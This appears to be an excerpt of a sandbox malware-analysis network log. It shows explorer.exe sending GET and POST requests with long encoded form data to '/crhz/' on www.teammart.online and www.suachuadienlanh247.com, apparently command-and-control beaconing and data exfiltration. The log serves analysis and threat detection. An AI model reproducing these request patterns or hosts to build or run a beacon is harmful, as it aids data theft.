                                                                Jan 30, 2023 14:52:54.016726017 CET169OUTGET /crhz/?90Z5=-8rTZKCzAmXPlO&ghJ5T=4Z6KAxgBWslvyWQs2zz1LTCSIJZnXz/Wr59nnN1quAvIIyJUwPyWYoHYYm82bfT5dpIzg2ZgrTpqnEgpaKo3IMTbbHn1kxCLU7tvpznsmq41 HTTP/1.1
                                                                Host: www.teammart.online
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jan 30, 2023 14:52:54.282556057 CET170INHTTP/1.1 404 Not Found
                                                                Date: Mon, 30 Jan 2023 13:52:54 GMT
                                                                Server: Apache
                                                                Content-Length: 5278
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37 2e 34 36 20 30 2d 31 34 2e 37 33 2d 2e 39 34 2d 32 31 2e 38 31 2d 32 2e 38 33 2d 37 2e 30 38 2d 31 2e 38 39 2d 31 33 2e 37 36 2d 34 2e 36 2d 32 30 2e 30 34 2d 38 2e 31 34 61 38 38 2e 32 39 32 20 38 38 2e 32 39 32 20 30 20 30 20 31 2d 31 37 2e 33 35 2d 31 32 2e 38 31 63 2d 35 2e 32 39 2d 35 2d 39 2e 38 34 2d 31 30 2e 36 37 2d 31 33 2e 36 36 2d 31 36 2e 39 39 2d 33 2e 38 32 2d 36 2e 33 32 2d 36 2e 38 2d 31 33 2e 31 39 2d 38 2e 39 32 2d 32 30 2e 36 2d 32 2e 31 32 2d 37 2e 34 31 2d 33 2e 31 39 2d 31 35 2e 32 37 2d 33 2e 31 39 2d
                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-
                                                                Jan 30, 2023 14:52:54.282608986 CET171INData Raw: 32 33 2e 35 38 76 2d 33 33 2e 31 33 63 30 2d 31 32 2e 34 36 20 32 2e 33 34 2d 32 33 2e 38 38 20 37 2e 30 31 2d 33 34 2e 32 37 20 34 2e 36 37 2d 31 30 2e 33 38 20 31 30 2e 39 32 2d 31 39 2e 33 33 20 31 38 2e 37 36 2d 32 36 2e 38 33 20 37 2e 38 33
                                                                Data Ascii: 23.58v-33.13c0-12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5
                                                                Jan 30, 2023 14:52:54.282660961 CET173INData Raw: 39 20 32 2e 30 33 20 31 2e 33 32 20 33 2e 37 35 20 33 2e 30 32 20 35 2e 31 37 20 35 2e 30 39 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 31 5f 32 22 20 64 3d 22 4d 36 38 38 2e 33 33 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31
                                                                Data Ascii: 9 2.03 1.32 3.75 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"
                                                                Jan 30, 2023 14:52:54.282712936 CET174INData Raw: 31 39 20 31 35 2e 32 37 20 33 2e 31 39 20 32 33 2e 35 38 76 33 33 2e 31 34 7a 6d 2d 33 37 2e 31 2d 33 33 2e 31 33 63 30 2d 37 2e 32 37 2d 31 2e 33 32 2d 31 33 2e 38 38 2d 33 2e 39 36 2d 31 39 2e 38 32 2d 32 2e 36 34 2d 35 2e 39 35 2d 36 2e 31 36
                                                                Data Ascii: 19 15.27 3.19 23.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.0
                                                                Jan 30, 2023 14:52:54.282764912 CET174INData Raw: 75 73 73 69 61 6e 62 6c 75 72 20 63 6c 61 73 73 3d 22 62 6c 75 72 22 20 72 65 73 75 6c 74 3d 22 63 6f 6c 6f 72 65 64 42 6c 75 72 22 20 73 74 64 64 65 76 69 61 74 69 6f 6e 3d 22 34 22 3e 3c 2f 66 65 67 61 75 73 73 69 61 6e 62 6c 75 72 3e 0a 20 20
                                                                Data Ascii: ussianblur class="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                13192.168.2.649730103.221.223.10480C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jan 30, 2023 14:52:59.707041025 CET176OUTPOST /crhz/ HTTP/1.1
                                                                Host: www.suachuadienlanh247.com
                                                                Connection: close
                                                                Content-Length: 191
                                                                Cache-Control: no-cache
                                                                Origin: http://www.suachuadienlanh247.com
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://www.suachuadienlanh247.com/crhz/
                                                                Accept-Language: en-US
                                                                Accept-Encoding: gzip, deflate
                                                                Data Raw: 67 68 4a 35 54 3d 50 41 71 6b 64 53 34 39 69 76 63 39 4c 48 41 4b 35 73 76 63 4b 48 45 61 6e 47 71 45 39 71 49 43 6a 78 6b 72 46 52 67 2d 45 69 65 57 6b 61 6f 50 4a 54 6a 77 75 34 55 62 44 63 4b 5f 64 33 78 71 56 5f 53 39 6e 46 71 69 4a 35 67 76 32 45 41 38 44 78 55 36 5a 69 33 53 42 42 75 69 70 33 53 61 59 46 35 73 6d 68 6e 56 46 33 32 6a 77 73 41 57 4b 58 4d 44 32 4b 57 45 4b 64 61 59 58 5f 6f 37 6d 53 34 2d 4a 6a 74 34 6a 72 5a 55 55 57 61 57 66 2d 67 47 6f 68 28 70 77 67 6e 7a 34 4e 6d 4b 4d 6e 4a 67 53 36 4c 36 31 55 38 42 37 75 59 74 74 73 36 71 43 39 45 2e 00 00 00 00 00 00 00 00
                                                                Data Ascii: ghJ5T=PAqkdS49ivc9LHAK5svcKHEanGqE9qICjxkrFRg-EieWkaoPJTjwu4UbDcK_d3xqV_S9nFqiJ5gv2EA8DxU6Zi3SBBuip3SaYF5smhnVF32jwsAWKXMD2KWEKdaYX_o7mS4-Jjt4jrZUUWaWf-gGoh(pwgnz4NmKMnJgS6L61U8B7uYtts6qC9E.
                                                                Jan 30, 2023 14:53:00.332551956 CET177INHTTP/1.1 404 Not Found
                                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                cache-control: no-cache, must-revalidate, max-age=0
                                                                content-type: text/html; charset=UTF-8
                                                                link: <https://suachuadienlanh247.com/wp-json/>; rel="https://api.w.org/"
                                                                content-encoding: gzip
                                                                vary: Accept-Encoding
                                                                transfer-encoding: chunked
                                                                date: Mon, 30 Jan 2023 13:53:00 GMT
                                                                server: LiteSpeed
                                                                connection: close
                                                                Data Raw: 63 66 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 1a db 6e db c8 f5 39 fe 0a 9a 46 6d 32 e1 45 94 6c cb a6 c2 24 bb 49 16 2d 90 dd 04 71 b6 8b 22 0e 82 11 39 12 c7 e6 ad 33 43 cb 8a a2 e7 3e 17 fd 82 45 9f 8b 02 45 9f 76 1f b7 3f 92 3f e9 39 43 4a a2 2e 8e 1d 67 b3 6b c3 12 79 e6 dc e7 cc b9 90 be bf fd e4 f9 e3 57 7f 79 f1 54 8b 65 9a 3c d8 ba 8f 5f 5a 42 b2 61 a0 5f 30 5d 2b 38 1d b0 cb 40 cf 87 3e 60 c8 42 f8 ae 9b 0f 0b 27 a5 6e 26 76 74 2d 4c 88 10 81 9e e4 24 62 d9 d0 16 4c 52 2d cb ed 33 a1 23 2f 4a a2 07 5b 77 ee a7 54 12 2d 8c 09 17 54 06 fa f7 af be b1 8f 74 cd c5 95 84 65 e7 1a a7 49 a0 17 3c 1f b0 84 ea 5a 0c 12 03 1d 65 81 a8 61 5a 0c 9d 9c 0f dd cb 41 e6 7a de 3a 15 08 ed 93 f0 7c 85 4c 94 24 8c 4b 50 89 66 60 4a dc de ef 3a 61 9e ba 97 69 c2 8b d0 29 e2 42 31 02 4e 22 e4 ac 90 0f 8c 41 99 85 92 e5 99 81 e6 9b 13 fc 74 94 69 df 91 94 6a 81 b6 0c 70 38 2d 12 12 52 c3 3d ed 2b 63 4f fb ae b5 77 26 f6 cc a9 69 44 79 58 a6 34 93 ce ec e2 69 42 f1 cb ec dd 77 6b 71 5b 95 47 32 60 85 5e a6 a3 22 e7 12 7c 99 67 12 10 03 7d c4 22 19 07 11 bd 60 21 b5 d5 8d a5 b1 8c 49 46 12 5b 84 24 a1 41 e5 89 fb db b6 ad 9d 50 c2 c3 58 7b 9a 0d 59 46 b5 e7 85 64 29 7b 47 d0 18 ad 3f d6 5e 12 70 d5 b7 44 c6 9a 3d df 3f e1 70 80 a6 00 54 5e 89 73 30 d1 b6 81 9d 64 32 a1 0f 5e 90 21 d5 be cb a5 f6 4d 5e 66 11 d0 9d 7c f8 f9 5f b8 7f 1f 7e fe 37 d1 fe f7 77 f6 e1 e7 bf 65 5a f2 e1 a7 1f b3 58 eb ff f2 23 08 3f 8f 73 a2 81 97 ef bb 15 8b 25 03 79 de cf a5 68 98 37 c8 93 24 1f 59 10 27 2c 8b e8 a5 ee ce f0 21 06 0a ca e5 58 85 5b 92 a3 a5 0d b2 0b f6 f6 cf df 55 76 af 63 cb 71 d1 c4 25 5c b2 10 a9 af c0 46 2d 1b e8 9f 61 f2 55 22 f0 24 bc 45 07 34 c4 dc 8a 6b e5 44 39 62 52 52 ee 87 84 47 0d 8e a2 4c 53 c2 c7 6f 13 c2 87 f4 2d 4b c1 8e 2b 49 7f 75 a3 ab 68 d6 d0 f5 e0 f1 a2 48 58 a8 e2 ce 4d a2 7b 67 22 cf e6 d9 01 c3 cd c6 78 83 e8 8d 69 4a f4 07 13 fd 91 d2 e3 52 ea be 3e 8f 4b b5 88 c7 5d b7 f4 47 43 4e 8a 58 f7 5f 03 aa da 5c 5f 7f 41 39 72 85 35 16 35 c9 36 1f f6 9d 62 86 ae 76 c1 d7 49 94 b2 4c 9f 5a 0b 86 3f d0 fe 09 6c d3 8d 39 8e 68 5f 54 f8 25 4f ae c5 5f 48 3e 39 2d 3d 4a 23 f4 ad ba 1a 10 ed b4 6c 79 9e c7 f0 36 ec 82 97 f1 82 78 e8 68 58 69 51 af e9 6c 4b 2f ca 7e c2 44 4c b9 ee 4f 3e cd fa a9 a5 b3 ec 19 a4 f3 12 43 c3 c7 9c de f4 c0 d7 1c 52 74 c8 cb b4 ff 8c 09 39 77 c4 4e 7f 0e 07 18 98 9c e2 72 9d c8 96 f6 04 e1 7f 82 75 54 32 07 e7 c0 f6 03 d4 ab a9 6e aa ee c2 55 7f 84 64 a4 4f a7 6f 56 b6 09 63 75 a1 1d ec 43 51 01 aa 7d 58 90 af c7 f4 e7 ba 9e 89 17 90 4c 9e 0f 6e ee f9 59 94 6c 70 bd a5 37 1c 3b 67 d8 f4 36 9a de a8 13 98 e0 dd 45 0e ff 21 e7 d1 0b 4e 85 d0 4e 9e 3e d7 8a a4 84 9c af 52 f7 d6 a2 26 ee 45 99 b0 b1 6c 53 19 c6 7b 55 5d dc bb 4a db 3d 75
                                                                Data Ascii: cf3n9Fm2El$I-q"93C>EEv??9CJ.gkyWyTe<_ZBa_0]+8@>`B'n&vt-L$bLR-3#/J[wT-TteI<ZeaZAz:|L$KPf`J:ai)B1N"Atijp8-R=+cOw&iDyX4iBwkq[G2`^"|g}"`!IF[$APX{YFd){G?^pD=?pT^s0d2^!M^f|_~7weZX#?s%yh7$Y',!X[Uvcq%\F-aU"$E4kD9bRRGLSo-K+IuhHXM{g"xiJR>K]GCNX_\_A9r556bvILZ?l9h_T%O_H>9-=J#ly6xhXiQlK/~DLO>CRt9wNruT2nUdOoVcuCQ}XLnYlp7;g6E!NN>R&ElS{U]J=u
                                                                Jan 30, 2023 14:53:00.332595110 CET178INData Raw: 90 af a3 0d a3 cc 39 13 11 4d d8 05 77 32 2a 57 a9 56 29 3e 5e 85 47 85 5d e7 20 57 c2 81 a7 c2 1d 24 44 0a d8 78 17 b2 05 95 c2 3d 13 2e 10 66 e7 80 5e 66 b2 2c 40 f8 c3 0b ca 83 8e e3 1d 3a 07 bf 99 74 01 35 e4 7c 0c 3d 4d 44 fb 84 ff 4e 4a c8
                                                                Data Ascii: 9Mw2*WV)>^G] W$Dx=.f^f,@:t5|=MDNJ<O$+$fQ!(l7B'P%dCM,j{#YaI?_"?3rfzT{cvGQAP'z}bi S
                                                                Jan 30, 2023 14:53:00.332622051 CET180INData Raw: 84 9f 53 6e 7b 2d 64 77 d8 27 de b5 88 73 c6 2d 48 8a 87 d7 e1 b7 15 e3 03 72 d4 bd 16 71 c6 f8 18 78 77 0e 9a e8 55 ac 54 8f 67 ed 01 84 ad f0 a1 7c 4e 1f a5 34 62 44 33 ec 11 ed 9f 33 69 23 6a fd 24 b7 60 97 34 b1 39 b6 f7 7e 1b ce 14 2e c1 30
                                                                Data Ascii: Sn{-dw's-HrqxwUTg|N4bD33i#j$`49~.0'%J;nG3'k s@V/IXrP6`smc,)I|]CqD!^ !9"+NVt::~LFP7pf,LJ3;~RRl3D
                                                                Jan 30, 2023 14:53:00.340389013 CET181INData Raw: 35 63 61 0d 0a dc 5b 5f 73 e2 36 10 ff 2a 1a f2 40 ef 62 39 b2 8c 0d 0e 33 e9 80 c1 bd 3c 34 93 84 e6 a6 ed 9b 13 20 38 71 6c 0e 3b 21 29 c3 77 ef ae 24 1b f3 27 39 e2 69 8e 1e 71 c6 66 ad 45 2b fd b4 5a ed 6a c5 36 36 43 14 fc 17 46 83 de 60 22
                                                                Data Ascii: 5ca[_s6*@b93<4 8ql;!)w$'9iqfE+Zj66CF`"B.(+y*t;{[=0SuC_RL;<lbl[nf)-rY&2yeDvP_RFRPjzN(tBQ"tQ5'i.2i
                                                                Jan 30, 2023 14:53:00.340432882 CET181INData Raw: e1 7a 6a 3d 11 03 c5 5d 58 d5 b9 2b ed 68 ab ce c1 f6 d5 73 bd 16 60 ef 05 d0 56 66 f7 2e de 01 33 43 98 99 44 94 19 a6 52 52 0b b5 dc 92 5a ce db 6d 18 88 b6 2b 09 d7 96 cf 4e 4b 3d 5d b5 04 e1 18 d8 6a 60 ea 35 35 16 b2 d0 e0 5c 3e 1d b5 cc 3b
                                                                Data Ascii: zj=]X+hs`Vf.3CDRRZm+NK=]j`55\>;rX@=-@fP3>Fg+ct_<`o KtG]N+E(?M:sUw,]DvYw53;_
                                                                Jan 30, 2023 14:53:00.353301048 CET183INData Raw: 37 37 34 0d 0a ec 5d dd 6f db 36 10 7f 8e ff 8a 83 8a 0e 2b 50 c9 92 6d f9 a3 b5 8d 35 dd 5a f4 a1 7b 68 ba be 0c 43 20 c7 b2 a2 56 96 04 c9 ae 93 01 fb df 77 77 fc 10 65 c9 99 13 b4 41 b1 24 45 61 5b 3c 1e ef c8 23 79 22 f9 3b ea 45 d7 ae 08 1e
                                                                Data Ascii: 774]o6+Pm5Z{hC VwweA$Ea[<#y";E$EVEv,|R#X`wE_#Z'iw>Jaiv5@|g*H"tVB"NxY}W^h/BU,OOW1ayi
                                                                Jan 30, 2023 14:53:00.353323936 CET183INData Raw: 2d f3 4c 33 87 a8 3a 99 0d a7 e7 b6 9a 50 59 78 2a 24 c8 18 59 93 37 1e b8 ee d0 eb d3 32 8c ea 7e 32 0d 4c 31 e0 ca 73 61 bd b4 e9 23 89 f8 e3 da e7 27 f4 81 4f e8 a3 08 45 6c ae 43 63 2e 17 bf 0c 36 81 1d a4 31 7a 8c ec fe 2e c3 77 e9 1f d8 45
                                                                Data Ascii: -L3:PYx*$Y72~2L1sa#'OElCc.61z.wEh%U=17M}@Vu~L>L4]"H3D_OP]Xpo%cqnYn/6rw|'[(=)`U$H>i5#YybM|GS:J4W1[
                                                                Jan 30, 2023 14:53:00.376853943 CET185INData Raw: 35 63 66 0d 0a ec 1d cb 8e 1b c7 f1 bc fa 8a 06 8d 58 da 80 e4 ce 0c 87 5c 72 25 ad 61 c9 31 64 c0 8a 0c 43 40 8e c2 90 9c 25 09 f1 15 0e b9 e2 7a 91 83 cf 39 e5 68 e4 22 d9 10 7c 89 01 c3 3e 04 d0 1e 72 20 a0 ff d8 3f 49 55 f5 63 ba 67 7a 1e 24
                                                                Data Ascii: 5cfX\r%a1dC@%z9h"|>r ?IUcgz$W dOuUwuuuWUObeDW[|3rf$L)lH9Rb=@x48dIT0Vbl*=M,w<%x,}b/`c#QV
                                                                Jan 30, 2023 14:53:00.376912117 CET185INData Raw: 71 a6 10 6a 51 ea a6 84 11 e5 90 d2 3f e1 80 ae 26 d3 a8 e6 73 f6 0b 79 8b d5 2e 4f 04 d8 ac e8 2a 65 0e 90 8c 93 12 1f 2f 08 cc 5c 36 46 98 61 ea 62 b6 02 e5 89 73 50 25 15 c4 a8 d0 dc 04 35 9f bd 78 41 de bd 9a be e6 0d bd d3 4f 61 a8 60 d0 60
                                                                Data Ascii: qjQ?&sy.O*e/\6FabsP%5xAOa``?8x-}7z`>{8r7^_}dX*whU8mYq(@U@pK~LG~AQ+# Zyn0
                                                                Jan 30, 2023 14:53:00.382388115 CET186INData Raw: 38 36 35 0d 0a aa d3 01 ec 94 c2 55 6d 38 0b 80 aa e1 5f e3 8e cd 3e 7a 42 71 9c 75 df a9 d6 b2 8c a1 3e 88 8d 1f 31 c1 b5 89 ea d1 44 bd 63 ee ba e4 b9 db 9a 98 a5 e8 f6 93 cb 34 a9 20 11 04 d0 be d3 ce d2 ba 1f 64 94 6f ec 6c b4 4e b8 b2 d3 ba
                                                                Data Ascii: 865Um8_>zBqu>1Dc4 dolN!Vs)6uD&@|&.7OXeX6WW%TH;I}_m~UYw/>GW;@:Go~W?a"o/l8
                                                                Jan 30, 2023 14:53:00.631855011 CET188INData Raw: fa 44 3b a6 db f6 48 3d 79 ae 46 18 c7 bb 05 2a ab 5d 38 31 c3 31 ca e3 a8 87 45 51 94 4f dd f1 48 62 5c 4f 9b 06 6e 83 06 db f5 0a c5 48 de 29 96 4f a3 0a 5c f5 3a 0a bf 0f 13 de 05 59 6a 66 8c 9e bc f5 23 71 8d 30 7f d7 ec ee 47 99 f7 0c df cd
                                                                Data Ascii: D;H=yF*]811EQOHb\OnH)O\:Yjf#q0GDDuLy6y|]9t|S.(-t|i:RgjOxQL(TF+h-|/jsp q n&>7s Z-r zfi!N^;z


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                14192.168.2.649731103.221.223.10480C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jan 30, 2023 14:53:02.526284933 CET190OUTPOST /crhz/ HTTP/1.1
                                                                Host: www.suachuadienlanh247.com
                                                                Connection: close
                                                                Content-Length: 1455
                                                                Cache-Control: no-cache
                                                                Origin: http://www.suachuadienlanh247.com
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://www.suachuadienlanh247.com/crhz/
                                                                Accept-Language: en-US
                                                                Accept-Encoding: gzip, deflate
                                                                Data Raw: 67 68 4a 35 54 3d 50 41 71 6b 64 53 34 39 69 76 63 39 4c 6d 77 4b 28 4c 54 63 44 48 45 56 73 6d 71 45 6d 36 49 65 6a 78 67 72 46 51 6b 75 45 77 79 57 6a 4a 51 50 49 78 4c 77 69 59 55 62 57 4d 4b 37 51 58 78 38 56 5f 76 47 6e 45 61 59 4a 36 4d 76 77 6e 34 38 46 30 49 37 53 79 33 51 46 42 75 6c 70 33 53 31 59 42 64 7a 6d 67 53 49 46 7a 61 6a 77 61 63 57 4e 6e 4d 41 7a 4b 57 45 4b 64 61 55 58 5f 6f 54 6d 57 55 6d 4a 6a 46 6f 6a 38 68 55 55 79 4f 57 64 64 59 46 68 42 7e 42 34 41 6d 33 31 73 50 64 47 57 73 5a 5a 4b 43 59 70 46 4d 57 77 4f 6b 6b 35 2d 37 68 62 34 75 5f 70 53 42 68 50 6d 75 73 50 44 71 5f 4a 4f 67 41 79 70 37 35 41 4f 59 7a 77 79 76 45 35 37 64 36 37 71 61 46 74 6d 6e 4d 67 58 32 49 62 43 54 2d 28 34 4e 76 39 53 47 56 41 67 68 35 35 53 6c 34 71 45 4e 6d 33 48 34 4c 77 49 5a 41 7e 63 4b 74 64 39 56 4f 31 6a 44 5a 79 33 7e 68 31 64 72 71 76 56 72 7a 34 41 59 2d 30 42 48 36 57 43 7e 5f 53 43 6b 39 6e 38 78 61 70 57 6b 58 33 79 62 6d 34 52 74 5f 5a 75 72 63 6a 4c 30 32 45 5a 43 67 70 6f 36 38 6a 6d 33 73 59 62 6f 35 69 6d 75 5f 48 78 67 4f 33 6b 67 4c 59 63 44 63 33 4c 30 59 54 6e 4a 57 38 38 46 31 38 4b 38 64 78 2d 4a 76 77 37 44 4c 4b 71 46 7a 37 56 58 62 58 66 7a 59 78 55 6b 47 57 55 46 71 46 68 6f 55 53 63 5a 46 64 64 54 72 36 46 77 37 65 31 37 5a 78 67 61 4a 72 48 4d 4c 77 32 30 69 4e 66 65 71 7a 50 65 54 4a 62 49 6e 31 69 70 46 56 6c 64 6e 7e 59 44 74 64 4c 6a 4c 32 30 6a 33 5a 4b 6b 6f 44 30 37 59 43 54 46 6a 4c 5a 54 70 61 33 78 43 32 69 56 59 54 5f 58 4c 41 39 55 59 7e 45 73 75 68 63 52 43 31 6f 76 57 6a 48 41 6a 31 62 55 75 49 33 54 77 69 31 76 65 48 50 45 7a 38 59 55 70 63 52 76 6b 57 6b 33 50 79 30 69 55 79 64 34 59 4a 39 50 6f 6c 54 77 32 41 4b 42 4a 28 6d 53 73 70 53 55 45 4d 64 45 30 30 69 47 37 59 67 4d 6f 32 65 4f 6b 63 6d 70 75 6d 4d 6e 32 38 6d 6d 51 68 2d 72 61 6f 34 6d 47 77 32 74 44 30 77 28 57 30 64 58 37 46 6e 5a 6e 37 7a 7a 61 77 69 48 36 47 74 79 36 4c 6f 58 70 35 6f 64 72 73 6f 45 52 62 75 53 4e 31 52 7e 4e 73 4a 71 45 50 66 34 54 37 6c 75 66 47 72 58 62 56 70 35 6c 63 4a 66 6e 4d 58 71 45 30 38 35 6c 35 76 28 68 42 6a 44 35 54 35 41 36 42 62 78 59 66 78 58 4b 64 5f 58 50 43 51 59 7a 4d 51 7a 76 4a 48 4c 76 53 41 6e 55 33 78 35 4b 4a 6a 4f 63 63 68 51 7a 57 72 46 4a 6c 55 4e 74 46 6e 31 52 41 37 48 4a 56 33 76 71 43 37 62 63 33 33 50 79 56 47 71 51 75 67 59 73 38 51 59 66 4d 77 7a 74 6f 66 77 77 43 6c 6f 63 69 34 6e 76 4e 56 34 33 51 78 72 71 70 50 53 71 38 77 68 75 34 37 31 72 59 67 58 5a 72 7a 74 37 64 52 44 63 4c 79 6b 76 5a 74 66 6d 72 47 65 7a 33 73 67 52 65 78 6a 56 30 64 4c 63 5a 4b 71 62 54 50 77 52 67 61 70 63 48 78 45 56 72 54 42 36 37 58 6e 36 34 6b 34 2d 71 45 70 65 56 52 50 75 6c 36 32 6a 6b 4d 49 79 32 56 62 4f 45 39 65 32 43 45 33 4e 75 62 4d 55 6c 7a 63 62 78 72 41 43 67 73 71 47 36 44 6b 35 51 74 74 36 73 71 79 4a 4c 76 37 47 50 68 63 6e 47 57 63 46 59 45 44 37 73 58 6b 6d 6c 4f 65 30 31 63 67 6d 35 51 71 68 55 30 4e 41 39 62 67 68 54 6f 56 63 36 39 58 33 42 58 35 54 31 58 38 6e 74 